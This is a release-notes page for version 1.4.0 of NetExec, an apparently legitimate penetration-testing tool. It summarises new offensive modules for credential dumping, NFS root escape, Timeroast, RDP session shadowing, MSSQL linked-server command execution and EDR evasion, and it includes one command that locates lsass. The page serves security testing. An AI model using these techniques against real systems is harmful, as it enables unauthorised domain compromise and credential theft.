NetExec Github

๐Ÿงˆv1.4.0 - SmoothOperator

Hello everyone!

It has been almost half a year since the last release and a lot of new features have been added since then. Besides the most dominant protocol, SMB, other protocols like NFS, LDAP, and MSSQL have seen some love with new modules and improvements.

Thank you to everyone who contributed over the past months, and of course, a big thank you to everyone who has been reporting issues on GitHub and helping to troubleshoot or taking part in discussions on Discord. If you want to join our Discord, follow the link.

In case you didn't know, this wiki is open source too and you can contribute to it. If you would like to add missing content or improve existing content, please feel free to do so. Any help is much appreciated! You can find the wiki's source code on GitHub here.

Backup Operator to Domain Admin

As the name suggest, the new module -M backup_operator can leverage the Backup Operator privileges to dump the SAM / SECURITY of the DC. This ultimately leads to a full compromise of the domain with the dump of the NTDS.dit. Huge thanks to @mpgn for this module.

Backup Operator to full domain compromise

Certificate Authentication

NetExec now also supports certificate authentication, thanks to the integration of @dirkjanm's PKINITtools authentication mechanisms into NetExec, by @mpgn.

--pfx-cert/--pfx-base64 with --pfx-pass for PFX certificates
--pem-cert with --pem-key for PEM certificates
Certificate authentication using a pfx certificate
Certificate authentication using a crt and key certificate

NFS Escape to Root File System

Recent research has shown that the default NFS configuration on Linux systems is often insecure. In short: The NFS server does not check if a requested file is inside the exported directory. This means that if a user has access to the NFS share, they can access any file on the system. In combination with write access, this can lead to a full compromise of the system.

The details of the attack can be found on our wiki page here or on the great blog post by the guys from HvS Consulting.

An implementation of the attack is now available in NetExec, indicating the vulnerability by a new flag in the host banner. The implementation was done by @NeffIsBack.

Note: With this update, the semantics of the file download and upload flags have been changed. Don't forget to check at the new flag usage.

Example how to own a Debian host with read/write privileges and no_root_squash enabled (the latter is not necessarily needed)

Dumping SAM and LSA

One of NetExec's most prominent features is dumping the local account database (SAM) and the SECURITY registry hive (LSA secrets). Previously, Impacket achieved this by writing the SAM and SECURITY hives to a temporary file on disk, which was then deleted. However, this has now changed, as @laxaa has implemented a method that retrieves the data directly from the registry hives via the remote registry service, which he has contributed to Impacket. Thanks to @mpgn's integration, this method is now the default in NetExec and should offer much greater stealth. However, if you need to use the old method for some reason, you can still switch back with --sam/--lsa secdump.

Timeroasting the Domain

The Timeroast attack has been added as a module to NetExec. This attack allows an attacker on the network to request a hashed & salted version of any computer account NT hash in the domain without the need for authentication. If you would like to know more about the attack, check out this article from @SecuraBV. Module by @Disgame_.

Timeroast attack to retrieve hashed and salted computer NT hashes

QWINSTA

While the --loggedon-users flag is very useful if you don't have administrative privileges yet, if you do have control over the host it can be very useful to know where users are connecting from. Thanks to @Defte, NetExec uses the native qwinsta protocol implementation from Impacket to enumerate RDP sessions on the target, providing information such as the connecting IP address and session state.

Using qwinsta to enumerate active RDP sessions on the host

Tasklist

One of the best ways to trigger an EDR is to run the command -x 'tasklist /v /fo csv | findstr /i "lsass"'. However, listing tasks can be very useful for finding out what PID lsass.exe has or for checking which services are running with which privileges. Thanks to @Defte, NetExec now has a native implementation of the tasklist command that uses a native Windows protocol to query this information, which makes it less likely for EDRs to detect.

Query the tasklist over a native Windows protocol

SMB Share Listing Option

You can now list SMB shares directories with new --dir SMB flag! Created by @y0no.

Take a look into shares with the new --dir flag

NFS Share Listing Option

The NFS protocol has a build in share listing option as well. Without specifying a share it will try to use the escape-to-root-fs and list the root of the file system. Made by @NeffIsBack.

Listing directories with NFS and if possible the root file system

WAM Module

On the hunt for Entry ID or M365 access tokens? The new wam module by @zblurx dumps you these tokens from the local Token Broker Cache. You can find a great article by @xpn here if you want to learn more.

Enumerate Delegation Configurations in the Domain

It is now easier to enumerate miss configured delegation privileges, thanks to the integration by @termanix of impackets findDelegation.py tool. With the new LDAP flag --find-delegation any delegation can be found in the domain, including information about the user/computer object and the delegation details.

Enumerate delegation configurations in the domain

LDAPS Channel Binding now Supported

The new integration of LDAP Channel Binding is now available in Impacket, which means hardened environments are not a problem anymore. The LDAP protocol automatically picks up the required security options and will work out of the box without user interaction. Thanks to @NeffIsBack who took care of the Pull Request in Impacket.

Native LDAP Channel Binding support

RID Brute Force on MSSQL

You probably know the --rid-brute feature of the SMB protocol, but do you also know that this is possible with the MSSQL protocol as well? Well, now you can do it with NetExec, thanks to the work of @Adamkadaban!

Enumerate Domain Users and Groups with MSSQL

Coercing with MSSQL

Coercing connections with SMB is a well-known technique that can be achieved by using the coerce_plus module in NetExec. However, it is now also possible to coerce connections using MSSQL and the new mssql_coerce module by @lodos!

Coercing SMB authentications with the MSSQL protocol

Shadow RDP Module

The new shadowrdp module allows you to enable or disable Shadow RDP, which can be used to eavesdrop on a specific RDP session. Module by @Dfte.

Enable or disable shadow RDP on the target host

Notepad++ Module

Finding credentials in text files never happens, right? Right??

Well, even typing in sensible content into unsaved notepad++ documents can be dangerous, as they still leave traces on the system. With the new notepad++ module by @Dfte you can automatically dump this information ๐Ÿš€

Dumping unsaved notepad++ documents

New Modules on MSSQL

@deathflamingo added six new modules for the MSSQL protocol! That includes a few enumeration modules, as well as modules to perform actions on linked servers:

  • enum_impersonate: List users that can be impersonated (similar to the mssql_priv module)

  • enum_logins: Enumerate active MSSQL logins

  • enum_links: Enumerate linked MSSQL servers

  • exec_on_link: Execute SQL queries on a linked server

  • link_enable_cmdshell: Enable/Disable the cmd shell on a linked server

  • link_xpcmd: Execute shell commands on the linked server

A bunch of new modules for the MSSQL protocol

Enumerate Recently Accessed Files

By default, Windows creates LNK files for recently accessed objects and stores them in the AppData\Roaming\Microsoft\Windows\Recent directory. This module retrieves and parses these LNK files in order to extract the source files, which can be useful during internal assessments for retrieving recently modified and potentially juicy files. Module by @Defte.

Enumerate recently accessed files

Snipping Tool Module

Admins, think twice before taking screenshots of sensitive data! With the new snipped module you can automatically dump all screenshots done by the Windows Snipping Tool. Module by @Yeeb1.

Automatically download all screenshots from the target host

Uploading and Downloading files with SSH

The SSH protocol now also has --get-file and --put-file flags, to enable the easy upload and download of files with an authenticated session. Made by @jdholtz.

Upload and Download files via SSH

Remote UAC

This module enables you to disable, or more realistically re-enable, the remote UAC. This might be useful after manual exploitation, for example, to restore the system's original security (never leave a system more vulnerable than when you found it!). Module by @Defte.

Enabling the remote UAC of the target system

Detect drop-the-MIC

The drop-the-MIC attack is known for quite some time, but still really powerful if you find an outdated host. Relaying SMB traffic to LDAP? No Problem!

With the new module remove-mic made by @XiaoliChan you can easily check if the target is vulnerable to CVE-2019-1040, aka drop the MIC ๐Ÿ”ฅ

Check for CVE-2019-1040 aka drop-the-MIC

DPAPI Hash

Interested in dumping DPAPI hashes? This module, dpapi_hash, extracts DPAPI 'hashes' based on the user's protected master key, which can then be brute-forced with Hashcat (modes 15310 or 15900). Module by @nikaiw.

Dump the DPAPI hashes of users' master keys

Automatically Generate Hosts File

NetExec now creates host files for machines enumerated over SMB with --generate-hosts-file <filename>, making it easier to add/remove the /etc/hosts in CTFs and in real life. Made by @mpgn.

Generate the /etc/hosts file with hosts discovered over SMB

Automatically Generate KRB5 File

The new SMB flag --generate-krb5-file <filename> generates a valid krb5.conf file, similar to --generate-hosts-file, to enable Kerberos authentication with other tools. Made by @mpgn.

Generate a kerberos config file with the SMB

Outro

If you want to read about all changes in detail or download the latest standalone binaries check out the GitHub release page:

LogoRelease v1.4.0 ยท Pennyw0rth/NetExecGitHub

Notes by Alexand @termanix, copyedit by Marshall Hallenbeck

Previousv1.3.0 - NeedForSpeedNextLogo & Banner

Last updated

Was this helpful?